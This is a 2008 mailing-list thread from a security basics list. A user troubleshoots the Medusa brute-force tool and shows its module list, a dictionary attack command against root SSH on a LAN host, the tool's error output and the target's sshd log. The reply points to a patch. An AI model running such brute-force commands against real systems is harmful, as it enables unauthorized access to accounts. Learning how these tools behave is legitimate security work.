Security Basics mailing list archives

Previous By Date Next
Previous By Thread Next

Re: attack ssh with medusa

From: Adam hostetler <ahostetler () microsolved com>
Date: Thu, 21 Aug 2008 20:25:01 -0400
There's a patch for this on the foofus-tools list.

http://lists.foofus.net/pipermail/foofus-tools-foofus.net/

Look in the archives in August 08

Sergio Ruiz wrote:

Hi,

I have medusa to distribution ubuntu 7.10.
$ medusa -V
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk () foofus net>


with ssh.mod activated:

$ medusa -q
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk () foofus net>

  Available modules in "." :

  Available modules in "/usr/local/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 1.0.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
    + http.mod : Brute force module for HTTP : version 1.3.0
    + imap.mod : Brute force module for IMAP sessions : version 1.1.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
    + mysql.mod : Brute force module for MySQL sessions : version 1.2
    + nntp.mod : Brute force module for NNTP sessions : version 0.9
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
    + pop3.mod : Brute force module for POP3 sessions : version 1.1.1
    + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
    + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
    + rsh.mod : Brute force module for RSH sessions : version 1.0.1
    + smbnt.mod : Brute force module for SMB/NTLMv1 sessions : version 1.3.1
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY :
version 0.9.1
    + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
    + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
    + telnet.mod : Brute force module for telnet sessions : version 1.2.1
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon :
version 1.0.0
    + vnc.mod : Brute force module for VNC sessions : version 1.0.1
    + wrapper.mod : Generic Wrapper Module : version 1.0.1



when I start attack, I have a problem:
$ medusa -h 192.168.1.2 -u root -P /home/sergi/John_Passw/D8.DIC  -M ssh
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk () foofus net>

ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: - (1/106626)
ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: . (2/106626)
ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: .,m
(3/106626) ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1)
Password: .,mn (4/106626) ERROR: Failed to retrieve supported authentication modes.
Aborting... ERROR: No supported authentication methods located.
ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: .,mnb
(5/106626)
$


in the victim pc:
Aug 21 08:27:41 192.168.1.2 sshd[12649]: Failed password for root from 192.168.1.3
port 45652 ssh2 Aug 21 08:27:48 192.168.1.2 last message repeated 3 times



which the problem?

Thanks..





--
_______________________________________________________________________
Adam Hostetler                    ahostetler () microsolved com
Security Engineer                 (614) 351-1237 x 204
PGP Key Available by Request
MicroSolved is security expertise you can trust!

HoneyPoint Security Server
Attackers get stung, instead of you!
http://www.microsolved.com/honeypoint
Previous By Date Next
Previous By Thread Next

Current thread: